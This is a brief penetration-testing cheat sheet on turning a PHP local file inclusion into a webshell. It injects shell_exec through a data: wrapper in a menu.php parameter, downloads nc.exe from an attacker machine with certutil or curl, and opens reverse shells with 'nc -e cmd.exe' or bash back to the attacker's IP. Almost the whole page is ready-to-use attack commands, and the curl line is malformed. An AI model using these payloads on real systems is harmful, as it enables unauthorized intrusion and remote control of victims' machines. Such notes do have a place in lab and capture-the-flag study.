WebShell
You get this all the time
PHP Wrapper
# We know this is vulnerable to LFI so we use a data wrapper
# Hence, LFI without manipulating the local file. # ADDING SHELL EXEC IN END TO SEE
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("whoami")?>1. Host a Python web server on our attacking Kali machine
2. http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("certutil.exe -urlcache -f http://<Attacking IP>/nc.exe nc.exe")?>
3. Once the nc.exe is transferred issue the following command to get the local shell
nc.exe -e cmd.exe <Kali's IP> <port>
4. If the victim is a Kali machine, transfer the Netcat binary
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("curl -o http://<Attacking IP>/nc.exe")?>
5. netcat -e bin/bash <Kali's IP> <port>
# Try all transfer methods if one doesn't workLast updated